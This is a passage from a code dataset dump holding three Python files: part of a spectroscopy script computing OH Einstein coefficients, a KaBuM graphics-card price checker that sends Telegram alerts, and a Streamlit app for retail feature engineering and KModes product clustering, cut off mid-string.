{3}'.format(f, lj, hj, a))\n\nprint('*'*30)\n\nwith open('../data/my_potential/energy.dat') as inputfile:\n lines = inputfile.readlines()\n\nlevels_calc = []\nj_values = []\n\nfor line in lines:\n if len(line) > 1:\n data = line.split()\n \n if data[0].isdigit():\n if int(data[0]) == 0:\n levels_calc.append(float(data[1]))\n \n if 'J =' in line:\n j_values.append(float(data[-1]))\n\n\nfreq_calc = []\njlower_calc = []\njhigher_calc = []\necoeffs_calc = []\n\nfor l1, l2, j1, j2 in zip(levels_calc, levels_calc[1:], j_values, j_values[1:]):\n f = l2 - l1\n \n freq_calc.append(f)\n jlower_calc.append(j1)\n jhigher_calc.append(j2)\n\n s = (j1) / (2 * j1 + 1.)\n \n ecoeffs_calc.append(3.137 * 10**(-7) * f**3 * s)\n\nfor f, lj, hj, e in zip(freq_calc, jlower_calc, jhigher_calc, ecoeffs_calc):\n print('freq: {0}; lower j: {1}; higher j: {2}; einst: {3}'.format(f, lj, hj, e))\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"artfin/qc-workshop","sub_path":"hitran_api/oh_einst_coeff.py","file_name":"oh_einst_coeff.py","file_ext":"py","file_size_in_byte":1846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"14476941647","text":"import json, re\nfrom requests_html import HTMLSession\n\ndisponibilidade = 0\nnotificacao = 1\n\ndef check3090(data):\n\tcode = ['3','0','9','0','*']\n\tnome = data['nome'].replace(\" \",\"\").replace(\",\",\"\")\n\thit = 0\n\tfor letra in nome:\n\t\tif letra.upper() == code[0]:\n\t\t\tcode.pop(0)\n\t\t\thit += 1\n\t\telif hit != 0:\n\t\t\tbreak\n\treturn (len(code)==1)\n\ndef checkPrice3090(data):\n\treturn (data['preco_desconto'] < 14000)\n\ndef check3080(data):\n\tcode = ['3','0','8','0','*']\n\tnome = data['nome'].replace(\" \",\"\").replace(\",\",\"\")\n\thit = 0\n\tfor letra in nome:\n\t\tif letra.upper() == code[0]:\n\t\t\tcode.pop(0)\n\t\t\thit += 1\n\t\telif hit != 0:\n\t\t\tbreak\n\treturn (len(code)==1)\n\ndef checkPrice3080(data):\n\treturn (data['preco_desconto'] < 11000)\n\ndef check3070(data):\n\tcode = ['3','0','7','0','*']\n\tnome = data['nome'].replace(\" \",\"\").replace(\",\",\"\")\n\thit = 0\n\tfor letra in nome:\n\t\tif letra.upper() == code[0]:\n\t\t\tcode.pop(0)\n\t\t\thit += 1\n\t\telif hit != 0:\n\t\t\tbreak\n\treturn (len(code)==1)\n\ndef checkPrice3070(data):\n\treturn (data['preco_desconto'] < 7000)\n\ndef check3060Ti(data):\n\tcode = ['3','0','6','0','T','I','*']\n\tnome = data['nome'].replace(\" \",\"\").replace(\",\",\"\")\n\thit = 0\n\tfor letra in nome:\n\t\tif letra.upper() == code[0]:\n\t\t\tcode.pop(0)\n\t\t\thit += 1\n\t\telif hit != 0:\n\t\t\tbreak\n\treturn (len(code)==1)\n\ndef checkPrice3060Ti(data):\n\treturn (data['preco_desconto'] < 7000)\n\ndef check2060(data):\n\tcode = ['2','0','6','0','*']\n\tnome = data['nome'].replace(\" \",\"\").replace(\",\",\"\")\n\thit = 0\n\tfor letra in nome:\n\t\tif letra.upper() == code[0]:\n\t\t\tcode.pop(0)\n\t\t\thit += 1\n\t\telif hit != 0:\n\t\t\tbreak\n\treturn (len(code)==1)\n\ndef checkPrice2060(data):\n\treturn (data['preco_desconto'] < 2800)\n\ndef check1660Super(data):\n\tcode = ['1','6','6','0','S','U','P','E','R','*']\n\tnome = data['nome'].replace(\" \",\"\").replace(\",\",\"\")\n\thit = 0\n\tfor letra in nome:\n\t\tif letra.upper() == code[0]:\n\t\t\tcode.pop(0)\n\t\t\thit += 1\n\t\telif hit != 0:\n\t\t\tbreak\n\treturn (len(code)==1)\n\ndef checkPrice1660Super(data):\n\treturn (data['preco_desconto'] < 2200)\n\ndef check5700(data):\n\tcode = ['5','7','0','0','*']\n\tnome = data['nome'].replace(\" \",\"\").replace(\",\",\"\")\n\thit = 
0\n\tfor letra in nome:\n\t\tif letra.upper() == code[0]:\n\t\t\tcode.pop(0)\n\t\t\thit += 1\n\t\telif hit != 0:\n\t\t\tbreak\n\treturn (len(code)==1)\n\ndef checkPrice5700(data):\n\treturn (data['preco_desconto'] < 5500)\n\ndef check5600(data):\n\tcode = ['5','6','0','0','*']\n\tnome = data['nome'].replace(\" \",\"\").replace(\",\",\"\")\n\thit = 0\n\tfor letra in nome:\n\t\tif letra.upper() == code[0]:\n\t\t\tcode.pop(0)\n\t\t\thit += 1\n\t\telif hit != 0:\n\t\t\tbreak\n\treturn (len(code)==1)\n\ndef checkPrice5600(data):\n\treturn (data['preco_desconto'] < 4500)\n\ndef check5500(data):\n\tcode = ['5','5','0','0','*']\n\tnome = data['nome'].replace(\" \",\"\").replace(\",\",\"\")\n\thit = 0\n\tfor letra in nome:\n\t\tif letra.upper() == code[0]:\n\t\t\tcode.pop(0)\n\t\t\thit += 1\n\t\telif hit != 0:\n\t\t\tbreak\n\treturn (len(code)==1)\n\ndef checkPrice5500(data):\n\treturn (data['preco_desconto'] < 2800)\n\n\n\ndef checkAvailable(data):\n\treturn data['disponibilidade']\n\ndef requestKabumVGAPages():\n\tdados = []\n\ttries = 0\n\tpage = 1\n\twhile (page <= 5):\n\n\t\tstatusCode = 0\n\t\tkaBumWebPage = f'https://www.kabum.com.br/hardware/placa-de-video-vga?pagina={page}&ordem=4&limite=100&prime=false&marcas=[]&tipo_produto=[]&filtro=[]'\n\t\tsession = HTMLSession()\n\n\t\ttry:\n\n\t\t\tresponse = session.get(url=kaBumWebPage, timeout=2)\n\n\t\texcept Exception as e:\n\n\t\t\tprint(e)\n\t\t\ttries += 1\n\t\t\tif (tries == 3):\n\t\t\t\tprint('next page.')\n\t\t\t\tpage += 1\n\t\t\t\ttries = 0\n\n\t\telse:\n\n\t\t\tstatusCode = response.status_code\n# print(f'Status: {statusCode}')\n\t\t\tprint(f'Page: {page}')\n\n\t\t\tif statusCode == 200:\n\n\t\t\t\t# zera número de tentativas\n\t\t\t\ttries = 0\n\t\t\t\t# avança para a próxima página\n\t\t\t\tpage += 1\n\n\t\t\t\t# procura pelo script referente aos produtos na página\n\t\t\t\tscript = response.html.find('script')[21]\n\t\t\t\t#parse variável listagemDados\n\t\t\t\tinitIndex = script.text.find('const listagemDados')+6\n\t\t\t\tendIndex = script.text.find('const listagemErro')-1\n\t\t\t\tvar = script.text[initIndex:endIndex]\n\t\t\t\t#define regex match pattern\n\t\t\t\tmatch_scripts = re.findall(r'(.*) (=) ([^;].*)', var)\n\t\t\t\t# transforma str em JSON\n\t\t\t\tdado = json.loads(match_scripts[0][2])\n\n\t\t\t\t# caso haja uma listagem dos produtos na página\n\t\t\t\tif any(dado):\n\t\t\t\t\tdados.append(dado)\n# print(f'{len(dado)} itens nesta página.')\n\t\t\t\telse:\n\t\t\t\t\t# print('Nenhum item nesta página.')\n\t\t\t\t\tbreak\n\treturn dados\n\ndef createDb():\n\t\n\t# requisita página web\n\tdados = requestKabumVGAPages()\n\titensKabum = {}\n\tnotificado = False\n\t\n\tfor page in dados:\n\t\tfor dado in page:\n\t\t\titensKabum[dado['codigo']] = [dado['disponibilidade'], notificado]\n# itensKabum.append({dado['codigo']: [dado['disponibilidade'], False]})\n\t\n\treturn [itensKabum, dados]\n\ndef checkAMD(data, cont, itensKabum):\n\n\talertSent = False\n\t\n\tif check5700(data) and checkPrice5700(data):\n\t\t\n\t\tcont += 1\n\t\t\n\t\tif not itensKabum[data['codigo']][notificacao]:\n\t\t\t\n\t\t\talertSent = telegramSendAlert(data['link_descricao'])\n\t\t\n\t\telse:\n\t\t\tprint('Já notifiquei esta placa.')\n\t\t\n\t\tif(alertSent):\n\t\t\t\n\t\t\titensKabum[data['codigo']][notificacao] = alertSent\n\t\t\tprint('RX 5700 Notificada.')\n\t\t\t\n\tif check5600(data) and checkPrice5600(data):\n\t\t\n\t\tcont += 1\n\t\t\n\t\tif not itensKabum[data['codigo']][notificacao]:\n\t\t\t\n\t\t\talertSent = 
telegramSendAlert(data['link_descricao'])\n\t\t\n\t\telse:\n\t\t\tprint('Já notifiquei esta placa.')\n\t\t\n\t\tif(alertSent):\n\t\t\t\n\t\t\titensKabum[data['codigo']][notificacao] = alertSent\n\t\t\tprint('RX 5600 Notificada.')\n\t\n\tif check5500(data) and checkPrice5500(data):\n\t\t\n\t\tcont += 1\n\t\t\n\t\tif not itensKabum[data['codigo']][notificacao]:\n\t\t\t\n\t\t\talertSent = telegramSendAlert(data['link_descricao'])\n\t\t\n\t\telse:\n\t\t\tprint('Já notifiquei esta placa.')\n\t\t\n\t\tif(alertSent):\n\t\t\t\n\t\t\titensKabum[data['codigo']][notificacao] = alertSent\n\t\t\tprint('RX 5500 Notificada.')\n\ndef checkNividia(data, cont, itensKabum):\n\t\n\talertSent = False\n\t\n\tif check3090(data) and checkPrice3090(data):\n\t\t\n\t\tcont += 1\n\t\t\n\t\tif not itensKabum[data['codigo']][notificacao]:\n\t\t\t\n\t\t\talertSent = telegramSendAlert(data['link_descricao'])\n\t\t\n\t\telse:\n\t\t\tprint('Já notifiquei esta placa.')\n\t\t\n\t\tif(alertSent):\n\t\t\t\n\t\t\titensKabum[data['codigo']][notificacao] = alertSent\n\t\t\tprint('3090 Notificada.')\n\n\tif check3080(data) and checkPrice3080(data):\n\t\t\n\t\tcont += 1\n\t\t\n\t\tif not itensKabum[data['codigo']][notificacao]:\n\t\t\t\n\t\t\talertSent = telegramSendAlert(data['link_descricao'])\n\t\t\n\t\telse:\n\t\t\tprint('Já notifiquei esta placa.')\n\t\t\n\t\tif(alertSent):\n\t\t\t\n\t\t\titensKabum[data['codigo']][notificacao] = alertSent\n\t\t\tprint('3080 Notificada.')\n\n\tif check3070(data) and checkPrice3070(data):\n\t\t\n\t\tcont += 1\n\t\t\n\t\tif not itensKabum[data['codigo']][notificacao]:\n\t\t\t\n\t\t\talertSent = telegramSendAlert(data['link_descricao'])\n\t\t\n\t\telse:\n\t\t\tprint('Já notifiquei esta placa.')\n\t\t\n\t\tif(alertSent):\n\t\t\t\n\t\t\titensKabum[data['codigo']][notificacao] = alertSent\n\t\t\tprint('3070 Notificada.')\n\n\tif check3060Ti(data) and checkPrice3060Ti(data):\n\t\t\n\t\tcont += 1\n\t\t\n\t\tif not itensKabum[data['codigo']][notificacao]:\n\t\t\t\n\t\t\talertSent = telegramSendAlert(data['link_descricao'])\n\t\t\n\t\telse:\n\t\t\tprint('Já notifiquei esta placa.')\n\t\t\n\t\tif(alertSent):\n\t\t\t\n\t\t\titensKabum[data['codigo']][notificacao] = alertSent\n\t\t\tprint('3060 ti Notificada.')\n\n\tif check2060(data) and checkPrice2060(data):\n\t\t\n\t\tcont += 1\n\t\t\n\t\tif not itensKabum[data['codigo']][notificacao]:\n\t\t\t\n\t\t\talertSent = telegramSendAlert(data['link_descricao'])\n\t\t\n\t\telse:\n\t\t\tprint('Já notifiquei esta placa.')\n\t\t\n\t\tif(alertSent):\n\t\t\t\n\t\t\titensKabum[data['codigo']][notificacao] = alertSent\n\t\t\tprint('2060 Notificada.')\n\n\tif check1660Super(data) and checkPrice1660Super(data):\n\t\t\n\t\tcont += 1\n\t\t\n\t\tif not itensKabum[data['codigo']][notificacao]:\n\t\t\t\n\t\t\talertSent = telegramSendAlert(data['link_descricao'])\n\t\t\n\t\telse:\n\t\t\tprint('Já notifiquei esta placa.')\n\t\t\n\t\tif(alertSent):\n\t\t\t\n\t\t\titensKabum[data['codigo']][notificacao] = alertSent\n\t\t\tprint('1660 Super Notificada.')\n\ndef checkState(dado, itensKabum):\n\t\n\t\n\tif dado['disponibilidade'] != itensKabum[dado['codigo']][disponibilidade]:\n\t\t\n\t\titensKabum[dado['codigo']][disponibilidade] = dado['disponibilidade']\n\t\titensKabum[dado['codigo']][notificacao] = False\n\t\t\n\t\tprint(f\"Disponibilidade do Produto {dado['codigo']} Alterado para: {dado['disponibilidade']}\")\n\ndef telegramSendAlert(urlProduto):\n\t\n\t# criando a mensagem\n\tmessage = 'https://www.kabum.com.br' + urlProduto\n\t\n\t# inicializando variáveis do bot 
\n\t\n\t\n\t# message prototype\n\t# message = \"https://www.kabum.com.br/produto/129973/placa-de-v-deo-asus-nvidia-geforce-gtx-1650-4gb-gddr6-tuf-gtx1650-o4gd6-p-gaming\"\n\t\n\t# url for sending the message\n\turl = \"https://api.telegram.org/bot{}/sendMessage?chat_id={}&text={}\".format(token,chatId,message)\n\tsession = HTMLSession()\n\t\n\ttries = 0\n\twhile tries < 3:\n\t\ttry:\n\n\t\t\tresponse = session.get(url, timeout=1)\n\n\t\texcept Exception as e:\n\n\t\t\tprint(f'Error: {e}')\n\t\t\ttries += 1\n\n\t\telse:\n\t\t\treturn True\n\treturn False\n\t","repo_name":"CaioMM/checkPriceKaBuM","sub_path":"checkLib.py","file_name":"checkLib.py","file_ext":"py","file_size_in_byte":8878,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
+{"seq_id":"24714758852","text":"import pandas as pd\nimport streamlit as st\nimport numpy as np\nimport streamlit.components.v1 as components\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nimport seaborn as sns\nimport datetime, nltk, warnings\nimport itertools\nfrom pathlib import Path\nfrom sklearn.preprocessing import StandardScaler, MinMaxScaler\nfrom sklearn.cluster import KMeans\nfrom sklearn.metrics import silhouette_samples, silhouette_score\nfrom sklearn import preprocessing, model_selection, metrics, feature_selection\nfrom sklearn.model_selection import GridSearchCV, learning_curve, KFold\nfrom sklearn.svm import SVC, LinearSVC\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn import neighbors, linear_model, svm, tree, ensemble\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.linear_model import SGDClassifier\nfrom sklearn.ensemble import AdaBoostClassifier\nfrom sklearn.model_selection import cross_validate\nfrom sklearn.neural_network import MLPClassifier\nfrom kmodes.kmodes import KModes\nfrom IPython.display import display, HTML\nimport pickle\nimport plotly.graph_objs as go\nfrom plotly.offline import init_notebook_mode,iplot\nimport os\nwarnings.filterwarnings(\"ignore\")\nplt.rcParams[\"patch.force_edgecolor\"] = True\nplt.style.use('fivethirtyeight')\nmpl.rc('patch', edgecolor = 'dimgray', linewidth=1)\n\ndef get_data():\n    dir_path = os.path.dirname(os.path.realpath(__file__))\n    url = str(dir_path) + \"/data/data_cleaned.csv\"\n    return pd.read_csv(url, encoding=\"ISO-8859-1\")\n\ndef return_list_of_products(count_keywords, keywords_select):\n    list_product_keywords = []\n    for k,v in count_keywords.items():\n        word = keywords_select[k]\n        if word in ['pink', 'blue', 'tag', 'green', 'orange']: continue\n        if len(word) < 3 or v < 15: continue\n        if ('+' in word) or ('/' in word): continue\n        list_product_keywords.append([word, v])\n    return list_product_keywords\n\ndef app():\n    st.title(\"Data Preparation: Feature Engineering\")\n\n    ########### DATA PREPARATION: FEATURE ENGINEERING #################\n    def get_data_cleaned():\n        dir_path = os.path.dirname(os.path.realpath(__file__))\n        url = str(dir_path) + \"/data/data_cleaned_2.csv\"\n        return pd.read_csv(url, encoding=\"ISO-8859-1\", dtype={'CustomerID': str, 'InvoiceNo': str})\n\n    df_cleaned = get_data_cleaned()\n\n    st.markdown(\"\"\"\n    ### The Data Preparation section consists of steps that 
include:\n * Data Transformation\n * Feature Engineering\n\n ### In this Page we will create the following categories:\n 1. Product Categories\n 2. Customer Categories\n \"\"\")\n\n st.dataframe(df_cleaned.describe())\n\n st.write(\"\"\"\n Lets create a dataframe CartPrice which will contain the data for each transaction (group by invoice number)\n \"\"\")\n \n temp = df_cleaned.groupby(by=['CustomerID', 'InvoiceNo'], as_index=False)['TotalPrice'].sum()\n cart_price = temp.rename(columns = {'TotalPrice':'Cart Price'})\n\n st.code(\"\"\"\n temp_df = df_cleaned.groupby(by=['CustomerID', 'InvoiceNo'], as_index=False)['TotalPrice'].sum()\n cart_price = temp_df.rename(columns = {'TotalPrice':'Cart Price'})\n cart_price\n \"\"\")\n\n st.dataframe(cart_price)\n\n st.markdown(\"\"\"\n #### Add the date to the CartPrice DataFrame\n \"\"\")\n\n # with the code bellow we extract the date from the original df_cleaned, then we convert it to int and then assign it to the cart_price by reconstructing it to date\n df_cleaned['InvoiceDate_int'] = df_cleaned['InvoiceDate'].astype(np.datetime64).astype(np.int64)\n temp_df_2 = df_cleaned.groupby(by=['CustomerID', 'InvoiceNo'], as_index=False)['InvoiceDate_int'].mean()\n df_cleaned.drop('InvoiceDate_int', axis = 1, inplace = True) #now drop it because we dont actually need it\n cart_price.loc[:, 'InvoiceDate'] = pd.to_datetime(temp_df_2['InvoiceDate_int']) #set the value of date int to date time for the entire column\n st.dataframe(cart_price)\n\n st.markdown(\"\"\"\n #### Now lets utilize CartPrice Dataframe for visualizations\n * We have to create a barchart by grouping transactions to bins (lets say of 10 bins).\n * We exclude the transactions that costs more than 5000 Pounds because as we can see bellow they are very few\n \"\"\")\n\n # We can see tha the portion of transactions bigger than >5000 is very low (0.5%)\n cart_price_bigger5000 = cart_price[cart_price['Cart Price'] > 5000] \n perc = len(cart_price_bigger5000) / len(cart_price)\n st.markdown(\"Percentage of CartPrice values bigger than 5000 Pounds are: `{}`\".format(perc))\n\n # lets see the max and the minimum\n max = cart_price['Cart Price'].max()\n min = cart_price['Cart Price'].min()\n step = 5000/10\n\n bin_range = np.arange(0, 5000+step, step)\n out, bins = pd.cut(cart_price['Cart Price'], bins=bin_range, include_lowest=True, right=False, retbins=True)\n st.bar_chart(data=out.value_counts(sort=False), width=300, height=400)\n\n # Lets plot a barchart\n\n price_range = [0, 50, 100, 200, 500, 1000, 5000, 50000]\n count_price = []\n for i, price in enumerate(price_range):\n if i == 0: continue\n val = cart_price[(cart_price['Cart Price'] < price) &\n (cart_price['Cart Price'] > price_range[i-1])]['Cart Price'].count()\n count_price.append(val)\n\n plt.rc('font', weight='bold')\n f, ax = plt.subplots(figsize=(11, 6))\n colors = ['yellow', 'red', 'blue', 'green', 'magenta', 'cyan','black']\n labels = [ '{} < {}'.format(price_range[i-1], s) for i,s in enumerate(price_range) if i != 0]\n sizes = count_price\n explode = [0.0 if sizes[i] < 100 else 0.0 for i in range(len(sizes))]\n ax.pie(sizes, explode = explode, labels=labels, colors = colors,\n autopct = lambda x:'{:1.0f}%'.format(x) if x > 1 else '',\n shadow = False, startangle=0)\n ax.axis('equal')\n f.text(0.5, 1.01, \"Distribution of Orders\", ha='center', fontsize = 18)\n\n st.pyplot(fig=f)\n\n st.markdown(\"\"\"\n **From the Charts above we can see:**\n * The majority of CartPrice values are between 0-500 Pounds\n * There are a lot less 
CartPrice values above 500\n    \"\"\")\n\n    st.markdown(\"\"\"\n    # Understand Products: Create Product Categories\n    **What do we already know about the products?**\n    * Each product has a unique stockcode\n    * Each product has a Description text describing it\n\n    **We will use basic NLP and a bag-of-words model to create a DataFrame based on one-hot encoding and build clusters of products**\n\n    What does the dataset tell us about its products?\n    We are going to explore the content of the column Description in order to group the products into different categories.\n    This is going to be very exciting and tricky.\n    - We will use a one-hot representation to create the `word_X_matrix`, which will contain the one-hot (bag-of-words) representation of each description.\n    - We are going to understand what this does and what its purpose is for our goal of understanding the `Description` column.\n    \"\"\")\n\n    is_noun = lambda pos: pos[:2] == 'NN'\n\n    def bags_of_keywords(dataframe, column = 'Description'):\n        nltk.download('punkt')\n        nltk.download('averaged_perceptron_tagger')\n        stemmer = nltk.stem.SnowballStemmer(\"english\")\n        keywords_roots = dict() # collect the roots of words\n        keywords_select = dict() # associates the root and keyword\n        count_keywords = dict()\n        category_keys = []\n    \n        for s in dataframe[column]:\n            if pd.isnull(s): continue\n            lines = s.lower()\n            tokenized = nltk.word_tokenize(lines)\n            nouns = [word for (word, pos) in nltk.pos_tag(tokenized) if is_noun(pos)] \n    \n            for t in nouns:\n                t = t.lower() ; root = stemmer.stem(t)\n                if root in keywords_roots: \n                    keywords_roots[root].add(t)\n                    count_keywords[root] += 1 \n                else:\n                    keywords_roots[root] = {t}\n                    count_keywords[root] = 1\n    \n        for s in keywords_roots.keys():\n            if len(keywords_roots[s]) > 1: \n                min_length = 1000\n                for k in keywords_roots[s]:\n                    if len(k) < min_length:\n                        category_key = k ; min_length = len(k) \n                category_keys.append(category_key)\n                keywords_select[s] = category_key\n            else:\n                category_keys.append(list(keywords_roots[s])[0])\n                keywords_select[s] = list(keywords_roots[s])[0]\n    \n        print(\"Number of keywords in variable '{}': {}\".format(column, len(category_keys)))\n        return category_keys, keywords_roots, keywords_select, count_keywords\n\n\n    st.markdown(\"\"\"\n    Now we will create a new DataFrame holding the unique values of the column Description, obtained via df['Description'].unique().\n    \"\"\")\n\n    df_products = pd.DataFrame(df_cleaned.Description.unique())\n    df_products.rename(columns = {0: 'Description'}, inplace=True)\n    st.write(df_products)\n\n    st.write(\"Now let's get the keywords by running the `bags_of_keywords` function: \")\n    st.code(\"keywords, keywords_roots, keywords_select, count_keywords = bags_of_keywords(df_products)\")\n    keywords, keywords_roots, keywords_select, count_keywords = bags_of_keywords(df_products)\n\n    st.markdown(\"\"\"\n\n    Great! We now have 1473 keywords. 
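(The Snowball stemmer collapses inflected variants, e.g. a hypothetical 'heart'/'hearts' pair, onto a single root, so these counts are per root rather than per raw token.) 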
Our function returned the following:\n    * keywords: The list of extracted keywords.\n    * keywords_roots: A dictionary whose keys are the keyword roots and whose values are the sets of words associated with those roots.\n    * keywords_select: A dictionary with the keywords that were selected for the categories.\n    * count_keywords: A dictionary with the number of times each word has been used.\n\n    Now we create a list `list_keywords` and iterate over the items of the `count_keywords` dictionary, with `k` as the root and `v` as its count; for each item we append `[keywords_select[k], v]` to `list_keywords`, i.e. the selected keyword together with its frequency.\n    \"\"\")\n\n    list_keywords = []\n    for k,v in count_keywords.items():\n        list_keywords.append([keywords_select[k],v])\n    st.write(len(list_keywords))\n    st.write(list_keywords[:5])\n\n    product_list = sorted(list_keywords, key = lambda x:x[1], reverse = True)\n    st.dataframe(product_list)\n\n    st.markdown(\"\"\"\n    #### Plot the top 50 keywords\n    \"\"\")\n    ## Now let's plot the product list sorted by the top 50 keywords\n    plt.rc('font', weight='normal')\n\n    fig, ax = plt.subplots(figsize=(10, 10))\n\n    # bar lengths: frequencies of the top 50 keywords\n    y_axis = [i[1] for i in product_list[:50]]\n\n    # bar positions and labels for the top 50 keywords\n    x_axis = [k for k,i in enumerate(product_list[:50])]\n    x_label = [i[0] for i in product_list[:50]]\n    plt.yticks(x_axis, x_label)\n    plt.xlabel(\"Word Frequency\")\n    ax.barh(x_axis, y_axis, align = 'center', color=['black', 'red', 'green', 'blue', 'cyan', 'yellow', 'magenta'])\n    ax = plt.gca()\n    ax.invert_yaxis()\n    st.pyplot(fig)\n\n\n    st.markdown(\"\"\"\n    # CREATE AND DEFINE PRODUCT CATEGORIES BASED ON THE DESCRIPTION\n    \"\"\")\n    st.markdown(\"\"\"\n    ## Defining Product Categories\n\n    The keywords list contains 1473 keywords and the most frequent ones appear in more than 200 products.\n    When examining the content of this list, we notice that some names are useless and carry no information. We will drop such words (stopwords, color keywords, etc.; see the sketch below). 
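\n\n    As a rough restatement (the helper name `keep_keyword` is illustrative, not part of this app), the filter implemented in `return_list_of_products` at the top of this module keeps a root only when:\n\n    ```python\n    def keep_keyword(word, count):\n        # mirrors the checks in return_list_of_products above\n        if word in ['pink', 'blue', 'tag', 'green', 'orange']:\n            return False  # color/marker words carry no product information\n        if len(word) < 3 or count < 15:\n            return False  # too short or too rare to define a category\n        if ('+' in word) or ('/' in word):\n            return False  # composite descriptions\n        return True\n    ```\n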
\n Therefore we should discard these words from the analysis that follows and also let's consider only the words that appear more than 15 times.\n \"\"\")\n\n list_product_keywords = return_list_of_products(count_keywords=count_keywords, keywords_select=keywords_select)\n list_product_keywords.sort(key = lambda x:x[1], reverse = True)\n st.write('Number of words that were kept: `165`')\n\n st.markdown(\"\"\"\n Now we will use the onehot encoding principle: \n * Create a matrix of the unique Descriptions and put 0 and 1 where the description has a keyword or not\n \"\"\")\n list_descriptions = df_cleaned['Description'].unique()\n Word_X_matrix = pd.DataFrame()\n for key, frequency in list_product_keywords:\n # we create one column for each keyword so thats why we use the key as column\n key_UPPER = key.upper()\n list_to_append = list(map(lambda x:int(key_UPPER in x), list_descriptions))\n Word_X_matrix.loc[:, key_UPPER] = list_to_append\n\n st.dataframe(Word_X_matrix.head(5))\n\n\n st.markdown(\"\"\"\n ## Now lets add the price range to the matrix X for each description to augment the dataset: \n Shortly, we will create 5 price ranges (see the visualization of the price above `(pie chart and barchart))` to augment the dataset associated each one_hot_description with the price range\n \"\"\")\n with st.spinner('One-hot-encoding matrix creation in progress: Wait for it...'):\n threshold = [0, 1, 2, 3, 5, 10]\n label_col = []\n for i in range(len(threshold)):\n if i == len(threshold)-1:\n col = ' > {}'.format(threshold[i])\n else:\n col = '{} < {}'.format(threshold[i],threshold[i+1])\n label_col.append(col)\n Word_X_matrix.loc[:, col] = 0\n\n for i, prod in enumerate(list_descriptions):\n prix = df_cleaned[ df_cleaned['Description'] == prod]['UnitPrice'].mean()\n j = 0\n while prix > threshold[j]:\n j+=1\n if j == len(threshold): break\n Word_X_matrix.loc[i, label_col[j-1]] = 1\n\n st.write(\"{:<8} {:<20}\\n\".format('Range and', 'Count of Products in each price range'))\n\n for i in range(len(threshold)):\n if i == len(threshold)-1:\n col = ' > {}'.format(threshold[i])\n else:\n col = '{} < {}'.format(threshold[i],threshold[i+1]) \n st.write(\"{:<10} {:<20}\".format(col, Word_X_matrix.loc[:, col].sum()))\n\n st.write(\"adding the price range from 1-10 as columns to augment the dataset information (and enhance clustering)\")\n st.dataframe(Word_X_matrix.head(5))\n\n st.markdown(\"## Now we are going to use KModes to create clusters of products\")\n st.markdown(\"###### By running the code bellow we conclude to use 5 clusters for products:\")\n st.markdown(\"\"\"\n We use silhouette analysis to determine how many cluster we will use: https://scikit-learn.org/stable/auto_examples/cluster/plot_kmeans_silhouette_analysis.html\n \"\"\")\n st.code(\"\"\"\n for n_clusters in range(3,10):\n kmodes = KModes(init='Huang', max_iter=100, n_clusters=n_clusters, n_init=30, n_jobs=-1, random_state=42)\n clusters = kmodes.fit_predict(Word_X_matrix)\n silhouette_avg = silhouette_score(Word_X_matrix, clusters)\n print(\"For n_clusters =\", n_clusters, \"The average silhouette_score is :\", silhouette_avg)\n \"\"\")\n st.write(\"\"\"\n Result for n_clusters = 3 The average silhouette_score is : 0.11142050517146847\n * For n_clusters = 4 The average silhouette_score is : 0.11369426930609004\n * For n_clusters = 5 The average silhouette_score is : 0.15605111618663936\n * For n_clusters = 6 The average silhouette_score is : 0.15591614204472466\n * For n_clusters = 7 The average silhouette_score is : 
0.15497509597519985\n * For n_clusters = 8 The average silhouette_score is : 0.12549958008303969\n * For n_clusters = 9 The average silhouette_score is : 0.13722223664399463\n \"\"\")\n \n st.write(\"Through the code above we conclude to use `K=5` (we dont run it because of the long runtime required)\")\n st.write(\"The code bellow will create clusters of Products utilizing the word_X_matrix we created utilizing the one-hot-encoding principle and adding the price range scaled from 1-10\")\n st.code(\"\"\"\n n_clusters = 5\n silhouette_avg = -1\n while silhouette_avg < 0.15:\n kmodes = KModes(init='Huang', max_iter=75, n_clusters=n_clusters, n_init=30, n_jobs=-1, random_state=42)\n clusters = kmodes.fit_predict(Word_X_matrix)\n silhouette_avg = silhouette_score(Word_X_matrix, clusters)\n print('For n_clusters = ', n_clusters, ' The average silhouette_score is : ', silhouette_avg)\n \"\"\")\n\n st.write(\"Clustering in progres...\")\n n_clusters = 5\n silhouette_avg = -1\n with st.spinner('Clustering in progress: Wait for it...'):\n while silhouette_avg < 0.15:\n kmodes = KModes(init='Huang', max_iter=75, n_clusters=n_clusters, n_init=30, n_jobs=-1, random_state=42)\n clusters = kmodes.fit_predict(Word_X_matrix)\n silhouette_avg = silhouette_score(Word_X_matrix, clusters)\n st.write('For n_clusters = {} The average silhouette_score is : {}'.format(n_clusters,silhouette_avg))\n\n st.markdown(\"## Now we need to evaluate the content of clusters and check the distribution\")\n\n def graph_component_silhouette(n_clusters, lim_x, mat_size, sample_silhouette_values, clusters):\n plt.rcParams[\"patch.force_edgecolor\"] = True\n plt.style.use('fivethirtyeight')\n mpl.rc('patch', edgecolor = 'dimgray', linewidth=1)\n \n fig, ax1 = plt.subplots(1, 1)\n fig.set_size_inches(8, 8)\n ax1.set_xlim([lim_x[0], lim_x[1]])\n ax1.set_ylim([0, mat_size + (n_clusters + 1) * 10])\n y_lower = 10\n for i in range(n_clusters):\n \n # Aggregate the silhouette scores for samples belonging to cluster i, and sort them\n ith_cluster_silhouette_values = sample_silhouette_values[clusters == i]\n ith_cluster_silhouette_values.sort()\n size_cluster_i = ith_cluster_silhouette_values.shape[0]\n y_upper = y_lower + size_cluster_i\n cmap = cm.get_cmap(\"Spectral\")\n color = cmap(float(i) / n_clusters) \n ax1.fill_betweenx(np.arange(y_lower, y_upper), 0, ith_cluster_silhouette_values,\n facecolor=color, edgecolor=color, alpha=0.8)\n \n # Label the silhouette plots with their cluster numbers at the middle\n ax1.text(-0.03, y_lower + 0.5 * size_cluster_i, str(i), color = 'red', fontweight = 'bold',\n bbox=dict(facecolor='white', edgecolor='black', boxstyle='round, pad=0.3'))\n \n # Compute the new y_lower for next plot\n y_lower = y_upper + 10\n\n st.pyplot(fig)\n\n sample_silhouette_values = silhouette_samples(Word_X_matrix, clusters)\n\n graph_component_silhouette(n_clusters, [-0.07, 0.35], len(Word_X_matrix), sample_silhouette_values, clusters)\n\n\n st.markdown(\"\"\"\n ## Now we have clusters of products Lets create customer categories:\n - We will create the categories for our customers, but 